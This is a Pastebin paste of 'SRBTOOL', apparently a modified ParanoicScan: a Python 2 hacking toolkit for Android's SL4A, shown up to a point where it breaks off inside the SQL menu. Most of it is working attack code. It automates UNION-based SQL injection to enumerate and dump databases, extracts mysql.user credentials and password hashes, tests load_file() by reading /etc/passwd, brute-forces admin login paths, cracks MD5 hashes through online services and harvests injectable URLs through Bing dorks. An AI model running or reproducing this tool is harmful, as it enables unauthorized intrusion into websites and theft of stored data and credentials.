SERBIANHACKERS

SRBTOOL | ParanoicScan modified

Mar 31st, 2017
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 35.61 KB | None | 0 0
  1. #!usr/bin/python
  2.  
  3. import android,urllib2,socket,binascii,re,base64,hashlib
  4.  
  5. webvul = ""
  6.  
  7. # Functions
  8.  
  9. def hexencoder(texto):
  10.  return "[+] Result : "+"0x"+str(binascii.hexlify(texto))
  11.  
  12. def hexdecoder(texto):
  13.  text = re.sub("0x","",texto)
  14.  return "[+] Result : "+binascii.unhexlify(text)
  15.  
  16. def base64encoder(texto):
  17.  return "[+] Result : "+base64.b64encode(texto)
  18.  
  19. def base64decoder(texto):
  20.  return "[+] Result : "+base64.b64decode(texto)
  21.  
  22. def md5encoder(texto):
  23.  return "[+] Result : "+hashlib.md5(texto).hexdigest()
  24.  
  25. def reem(texto,parte):
  26.  return re.sub(parte,"hackman",texto)
  27.  
  28. def regexver(code):
  29.  if (re.findall("K0BRA(.*?)K0BRA",code)):
  30.   return True
  31.  else:
  32.   return False
  33.  
  34. def regexdar(code):
  35.  if (re.findall("K0BRA(.*?)K0BRA",code)):
  36.   return re.findall("K0BRA(.*?)K0BRA",code)[0]
  37.  
  38. def toma(web) :
  39.  nave = urllib2.Request(web)
  40.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  41.  op = urllib2.build_opener()
  42.  return op.open(nave).read()
  43.  
  44. def tomar(web,vars) :
  45.  nave = urllib2.build_opener()
  46.  nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
  47.  return nave.open(web,vars).read()
  48.  
  49. def getdata(web) :
  50.  nave = urllib2.Request(web)
  51.  nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  52.  op = urllib2.build_opener()
  53.  return op.open(nave).info()
  54.  
  55. def bypass(bypass):
  56.  if bypass == "--":
  57.   return("+","--")
  58.  elif bypass == "/*":
  59.   return("/**/","/**/")
  60.  else:
  61.   return("+","--")
  62.  
  63. def showtables(web):
  64.  pass1,pass2 = bypass("--")
  65.  respuesta = ""
  66.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  67.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  68.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  69.  respuesta = respuesta + "[+] Searching tables ...\n\n"
  70.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  71.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  72.   numbers = numbers[0]
  73.   respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"
  74.   for counter in range(17,int(numbers)):
  75.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  76.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  77.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  78.     table = table[0]
  79.     respuesta = respuesta + "[Table Found] : "+table+"\n"
  80.  else:
  81.   respuesta = respuesta + "[-] Not Found\n"
  82.  respuesta = respuesta + "\n[+] Finished"
  83.  return respuesta
  84.  
  85. def showcolumns(web,tabla):
  86.  respuesta = ""
  87.  pass1,pass2 = bypass("--")
  88.  tabla2 = tabla
  89.  tabla = "0x"+str(binascii.hexlify(tabla))
  90.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  91.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  92.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  93.  respuesta = respuesta + "[+] Searching columns ...\n\n"
  94.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  95.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  96.   numbers = numbers[0]
  97.   respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"  
  98.   for counter in range(0,int(numbers)):
  99.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  100.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  101.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  102.     column = column[0]
  103.     respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
  104.  else:
  105.   respuesta = respuesta + "[-] Not Found"
  106.  respuesta = respuesta + "\n\n[+] Finished"
  107.  return respuesta
  108.  
  109. def showdbs(web):
  110.  respuesta = ""
  111.  pass1,pass2 = bypass("--")
  112.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  113.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  114.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  115.  respuesta = respuesta + "[+] Searching DBS ...\n\n"
  116.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  117.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  118.   numbers = numbers[0]
  119.   respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"      
  120.   for counter in range(0,int(numbers)):
  121.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  122.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  123.     db = re.findall("K0BRA(.*?)K0BRA",code2)
  124.     db = db[0]
  125.     respuesta = respuesta + "\n[DB Found] : "+db
  126.  else:
  127.   respuesta = respuesta + "[-] Not Found"
  128.  respuesta = respuesta + "\n\n[+] Finished"
  129.  return respuesta
  130.  
  131. def dumper(web,table,col1,col2):
  132.  respuesta = ""
  133.  pass1,pass2 = bypass("--")
  134.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  135.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  136.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  137.  respuesta = respuesta + "[+] Searching values ...\n\n"
  138.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  139.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  140.   numbers = numbers[0]
  141.   respuesta = respuesta + "[+] Values Found : "+numbers+"\n"  
  142.   for counter in range(0,int(numbers)):
  143.    code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)    
  144.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  145.     c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  146.     c1 = c1[0]
  147.     c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  148.     c2 = c2[0]
  149.     respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
  150.     respuesta = respuesta + "["+col2+"] : "+c2+"\n"
  151.  else:
  152.   respuesta = respuesta + "[-] Not Found\n"
  153.  respuesta = respuesta + "\n[+] Finished"
  154.  return respuesta
  155.  
  156. def mysqluser(web):
  157.  pass1,pass2 = bypass("--")
  158.  respuesta = ""
  159.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  160.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  161.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  162.  respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
  163.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  164.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  165.   numbers = numbers[0]
  166.   respuesta = respuesta + "[+] Users Found : "+numbers+"\n"    
  167.   for counter in range(0,int(numbers)):
  168.    code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  169.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  170.     host = re.findall("K0BRA(.*?)K0BRA",code2)
  171.     host = host[0]
  172.     user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  173.     user = user[0]
  174.     passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  175.     passw = passw[0]
  176.     respuesta = respuesta + "\n[Host] : "+host
  177.     respuesta = respuesta + "\n[User] : "+user
  178.     respuesta = respuesta + "\n[Pass] : "+passw+"\n"    
  179.  else:
  180.   respuesta = respuesta + "[-] Not Found\n"
  181.  respuesta = respuesta + "\n[+] Finished"
  182.  return respuesta
  183.  
  184. def showcolumnsdb(web,db,table):
  185.  respuesta = ""
  186.  db2 = db
  187.  table2 = table
  188.  db = "0x"+str(binascii.hexlify(db))
  189.  table = "0x"+str(binascii.hexlify(table))
  190.  pass1,pass2 = bypass("--")
  191.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  192.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  193.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
  194.  respuesta = respuesta + "[+] Searching columns in DB ...\n"
  195.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  196.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  197.   numbers = numbers[0]
  198.   respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"  
  199.   for counter in range(0,int(numbers)):
  200.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  201.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  202.     column = re.findall("K0BRA(.*?)K0BRA",code2)
  203.     column = column[0]
  204.     respuesta = respuesta + "\n[Column Found] : "+str(column)
  205.  else:
  206.   respuesta = respuesta + "\n[-] Not Found"
  207.  respuesta = respuesta + "\n\n[+] Finished"
  208.  return respuesta
  209.  
  210. def showtablesdb(web,db):
  211.  respuesta = ""
  212.  db2 = db
  213.  db = "0x"+str(binascii.hexlify(db))
  214.  pass1,pass2 = bypass("--")
  215.  web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  216.  web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  217.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
  218.  respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
  219.  if (re.findall("K0BRA(.*?)K0BRA",code1)):
  220.   numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  221.   numbers = numbers[0]
  222.   respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"      
  223.   for counter in range(0,int(numbers)):
  224.    code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  225.    if (re.findall("K0BRA(.*?)K0BRA",code2)):
  226.     table = re.findall("K0BRA(.*?)K0BRA",code2)
  227.     table = table[0]
  228.     respuesta = respuesta + "\n[Table Found] : "+table
  229.  else:
  230.   respuesta = respuesta + "[-] Not Found"
  231.  respuesta = respuesta + "\n\n[+] Finished"
  232.  return respuesta
  233.  
  234. def more(web):
  235.  respuesta = ""
  236.  pass1,pass2 = bypass("--")
  237.  otraweb = web
  238.  respuesta = respuesta + "[+] Searching DB Details ...\n"
  239.  hextest = "0x2f6574632f706173737764"
  240.  web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  241.  web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
  242.  code0 = toma(web1+pass2)
  243.  if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  244.   datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  245.   datar = re.split("K0BRA",datax[0])
  246.   respuesta = respuesta + "\n[+] Username : "+datar[1]
  247.   respuesta = respuesta + "\n[+] Database : "+datar[2]
  248.   respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"
  249.  
  250.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  251.  if (re.findall("K0BRA",code1)):
  252.    respuesta = respuesta + "\n[+] mysql.user : on"
  253.  code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  254.  if (re.findall("K0BRA",code2)):
  255.    respuesta = respuesta + "\n[+] information_schema.tables : on"
  256.  codetres = toma(web2)
  257.  if (re.findall("ERTOR854",codetres)):
  258.   respuesta = respuesta + "\n[+] load_file() : on"
  259.  respuesta = respuesta + "\n\n[+] Finished"
  260.  return respuesta
  261.  
  262. def httpfinger(target):
  263.  respuesta = ""
  264.  try:
  265.   respuesta = respuesta + str(getdata(target))
  266.  except:
  267.   respuesta = respuesta + "[-] Error"
  268.  return respuesta
  269.  
  270. def scanpanel(web):
  271.  contador = 0
  272.  panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  273.  respuesta = ""
  274.  respuesta = respuesta + "[+] Scanning ...\n"
  275.  for path in panels:
  276.   try:
  277.    toma(web+"/"+path)
  278.    respuesta = respuesta + "\n[+] Link : "+web+"/"+path
  279.    contador = contador + 1
  280.   except urllib2.URLError, e:
  281.    pass
  282.  
  283.  if(contador==0) :
  284.   respuesta = respuesta + "\n[+] Not Found"
  285.  respuesta = respuesta + "\n\n[+] Finished"
  286.  return respuesta
  287.  
  288. def crackmd5(md5) :
  289.  respuesta = ""
  290.  code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
  291.  if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
  292.   rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
  293.   return "[+] Hash : "+rex[0][1]
  294.  else:
  295.   code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  296.   if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
  297.    rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
  298.    return "[+] Hash : "+rex[0]
  299.   else:
  300.    code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
  301.    if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
  302.     rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
  303.     return "[+] Hash : "+rex[0]
  304.    else:
  305.     return "[+] Hash : Not Found"
  306.  return respuesta
  307.  
  308. def locateip(pagina):
  309.  
  310.  respuesta = ""
  311.  
  312.  ip = socket.gethostbyname(str(pagina))
  313.  code = tomar("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=","ipaddress="+ip+"&Submit=submit")
  314.  
  315.  respuesta = respuesta + "[++] IP Address Location\n"
  316.  
  317.  if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  318.   rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  319.   city = rex[0][1]
  320.   respuesta = respuesta + "\n[++] City : "+city
  321.  else:
  322.   respuesta = respuesta + "\n[++] City : Not Found"
  323.  
  324.  if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  325.   rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  326.   country = rex[0][1]
  327.   respuesta = respuesta + "\n[++] Country : "+country
  328.  else:
  329.   respuesta = respuesta + "\n[++] Country : Not Found"
  330.  
  331.  if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
  332.   rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
  333.   state = rex[0][1]
  334.   respuesta = respuesta + "\n[++] State : "+state
  335.  else:
  336.   respuesta = respuesta + "\n[++] State : Not Found"
  337.  
  338.  code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  339.  
  340.  if (re.findall("whois\/(.*?)\">Whois",code)):
  341.   rex = re.findall("whois\/(.*?)\">Whois",code)
  342.   respuesta = respuesta + "\n\n[++] DNS Founds\n"
  343.   for dns in rex:
  344.    if not dns == "":
  345.     respuesta = respuesta + "\n[+] "+dns
  346.  
  347.  return respuesta
  348.  
  349. def sqltest(webs):
  350.  respuesta = ""
  351.  for web in webs :
  352.   if re.findall("=",web):
  353.    web = re.split("=",web)
  354.    web = web[0]+"="
  355.  
  356.    try:
  357.     code = toma(web+"-1+union+select+1--")
  358.     if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  359.      respuesta = respuesta + "[SQLI] : "+web+"\n"
  360.    except:
  361.     pass
  362.  return respuesta
  363.  
  364. def limpiar(pag):
  365.  
  366.  limpia = []
  367.  for p in pag:
  368.   if p not in limpia:
  369.    limpia.append(p)
  370.  return limpia
  371.  
  372. def bingscan(dork,count):
  373.  
  374.  respuesta = ""
  375.  
  376.  pag = []
  377.  s = 10  
  378.  
  379.  while s <= int(count):
  380.   try:
  381.    code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
  382.    d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
  383.    e = re.findall("<h2><a href=\"(.*?)\"",code,re.I)
  384.    s += 10
  385.    for a in d:
  386.     pag.append(a)
  387.    for b in e:
  388.     pag.append(b)
  389.  
  390.   except:
  391.    pass
  392.  
  393.  pag = limpiar(pag)
  394.  
  395.  return pag
  396.  
  397.  
  398. ##
  399.  
  400. aplicacion = android.Android()
  401.  
  402. def menuencoder():
  403.  
  404.  aplicacion.dialogCreateAlert("Encoders")
  405.  aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
  406.  aplicacion.dialogShow()
  407.  reh = aplicacion.dialogGetResponse().result
  408.  reb = reh["item"]
  409.  
  410.  if reb==0:
  411.  
  412.   aplicacion.dialogCreateAlert("MD5 Encoder")
  413.  
  414.   aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
  415.   ref = aplicacion.dialogGetResponse().result
  416.  
  417.   if not ref['which'] == 'positive' :
  418.    menuencoder()
  419.   else:
  420.    texto = ref['value']
  421.  
  422.    aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
  423.    aplicacion.dialogShow()
  424.  
  425.    don = md5encoder(texto)
  426.  
  427.    aplicacion.dialogDismiss()
  428.  
  429.    aplicacion.dialogCreateAlert("MD5 Encoder",don)
  430.    aplicacion.dialogSetPositiveButtonText("Done")
  431.    aplicacion.dialogShow()
  432.  
  433.    op = aplicacion.dialogGetResponse().result
  434.  
  435.    if op["which"] == "positive" :
  436.     menuencoder()
  437.  
  438.  
  439.  if reb==1 :
  440.  
  441.   aplicacion.dialogCreateAlert("Base64 Encoder")
  442.  
  443.   aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
  444.   ref = aplicacion.dialogGetResponse().result
  445.  
  446.   if not ref['which'] == 'positive' :
  447.    menuencoder()
  448.   else:
  449.    texto = ref['value']
  450.  
  451.    aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
  452.    aplicacion.dialogShow()
  453.  
  454.    don = base64encoder(texto)
  455.  
  456.    aplicacion.dialogDismiss()
  457.  
  458.    aplicacion.dialogCreateAlert("Base64 Encoder",don)
  459.    aplicacion.dialogSetPositiveButtonText("Done")
  460.    aplicacion.dialogShow()
  461.  
  462.    op = aplicacion.dialogGetResponse().result
  463.  
  464.    if op["which"] == "positive" :
  465.     menuencoder()
  466.  
  467.  if reb==2 :
  468.  
  469.   aplicacion.dialogCreateAlert("Base64 Decoder")
  470.  
  471.   aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
  472.   ref = aplicacion.dialogGetResponse().result
  473.  
  474.   if not ref['which'] == 'positive' :
  475.    menuencoder()
  476.   else:
  477.    texto = ref['value']
  478.  
  479.    aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
  480.    aplicacion.dialogShow()
  481.  
  482.    don = base64decoder(texto)
  483.  
  484.    aplicacion.dialogDismiss()
  485.  
  486.    aplicacion.dialogCreateAlert("Base64 Decoder",don)
  487.    aplicacion.dialogSetPositiveButtonText("Done")
  488.    aplicacion.dialogShow()
  489.  
  490.    op = aplicacion.dialogGetResponse().result
  491.  
  492.    if op["which"] == "positive" :
  493.     menuencoder()
  494.  
  495.  if reb==3 :
  496.  
  497.   aplicacion.dialogCreateAlert("Hex Encoder")
  498.  
  499.   aplicacion.dialogGetInput("Hex Encoder","Enter Text")
  500.   ref = aplicacion.dialogGetResponse().result
  501.  
  502.   if not ref['which'] == 'positive' :
  503.    menuencoder()
  504.   else:
  505.    texto = ref['value']
  506.  
  507.    aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
  508.    aplicacion.dialogShow()
  509.  
  510.    don = hexencoder(texto)
  511.  
  512.    aplicacion.dialogDismiss()
  513.  
  514.    aplicacion.dialogCreateAlert("Hex Encoder",don)
  515.    aplicacion.dialogSetPositiveButtonText("Done")
  516.    aplicacion.dialogShow()
  517.  
  518.    op = aplicacion.dialogGetResponse().result
  519.  
  520.    if op["which"] == "positive" :
  521.     menuencoder()
  522.  
  523.  
  524.  if reb==4 :
  525.  
  526.   aplicacion.dialogCreateAlert("Hex Decoder")
  527.  
  528.   aplicacion.dialogGetInput("Hex Decoder","Enter Text")
  529.   ref = aplicacion.dialogGetResponse().result
  530.  
  531.   if not ref['which'] == 'positive' :
  532.    menuencoder()
  533.   else:
  534.    texto = ref['value']
  535.  
  536.    aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
  537.    aplicacion.dialogShow()
  538.  
  539.    don = hexdecoder(texto)
  540.  
  541.    aplicacion.dialogDismiss()
  542.  
  543.    aplicacion.dialogCreateAlert("Hex Decoder",don)
  544.    aplicacion.dialogSetPositiveButtonText("Done")
  545.    aplicacion.dialogShow()
  546.  
  547.    op = aplicacion.dialogGetResponse().result
  548.  
  549.    if op["which"] == "positive" :
  550.     menuencoder()
  551.  
  552.  if reb==5:
  553.   menu()
  554.  
  555. def menusql():
  556.  
  557.  aplicacion.dialogCreateAlert("SQLI Scanner")
  558.  aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
  559.  aplicacion.dialogShow()
  560.  reez = aplicacion.dialogGetResponse().result
  561.  opsql = reez["item"]
  562.  
  563.  if opsql==0:
  564.          
  565.   aplicacion.dialogCreateAlert("SQLI Scanner")
  566.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
  567.   aplicacion.dialogShow()
  568.  
  569.   don = showtables(webvul)
  570.  
  571.   aplicacion.dialogDismiss()
  572.  
  573.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  574.   aplicacion.dialogSetPositiveButtonText("Done")
  575.   aplicacion.dialogShow()
  576.  
  577.   op = aplicacion.dialogGetResponse().result
  578.  
  579.   if op["which"] == "positive" :
  580.    menusql()
  581.    
  582.  if opsql==1 :
  583.          
  584.   aplicacion.dialogCreateAlert("SQLI Scanner")
  585.  
  586.   aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  587.   ref = aplicacion.dialogGetResponse().result
  588.  
  589.   if not ref['which'] == 'positive' :
  590.    menusql()
  591.   else:  
  592.    tabla = ref['value']
  593.  
  594.    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
  595.    aplicacion.dialogShow()
  596.  
  597.    don = showcolumns(webvul,tabla)
  598.    
  599.    aplicacion.dialogDismiss()
  600.  
  601.    aplicacion.dialogCreateAlert("SQLI Scanner",don)
  602.    aplicacion.dialogSetPositiveButtonText("Done")
  603.    aplicacion.dialogShow()
  604.  
  605.    op = aplicacion.dialogGetResponse().result
  606.  
  607.    if op["which"] == "positive" :
  608.     menusql()
  609.    
  610.  if opsql==2 :
  611.  
  612.   aplicacion.dialogCreateAlert("SQLI Scanner")
  613.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
  614.   aplicacion.dialogShow()
  615.  
  616.   don = showdbs(webvul)
  617.  
  618.   aplicacion.dialogDismiss()
  619.  
  620.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  621.   aplicacion.dialogSetPositiveButtonText("Done")
  622.   aplicacion.dialogShow()
  623.  
  624.   op = aplicacion.dialogGetResponse().result
  625.  
  626.   if op["which"] == "positive" :
  627.    menusql()
  628.    
  629.  if opsql==3 :
  630.  
  631.   aplicacion.dialogCreateAlert("SQLI Scanner")
  632.  
  633.   aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  634.   ref = aplicacion.dialogGetResponse().result
  635.  
  636.   if not ref['which'] == 'positive' :
  637.    menusql()
  638.   else:  
  639.    db = ref['value']
  640.  
  641.    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
  642.    aplicacion.dialogShow()
  643.  
  644.    don = showtablesdb(webvul,db)
  645.    
  646.    aplicacion.dialogDismiss()
  647.  
  648.    aplicacion.dialogCreateAlert("SQLI Scanner",don)
  649.    aplicacion.dialogSetPositiveButtonText("Done")
  650.    aplicacion.dialogShow()
  651.  
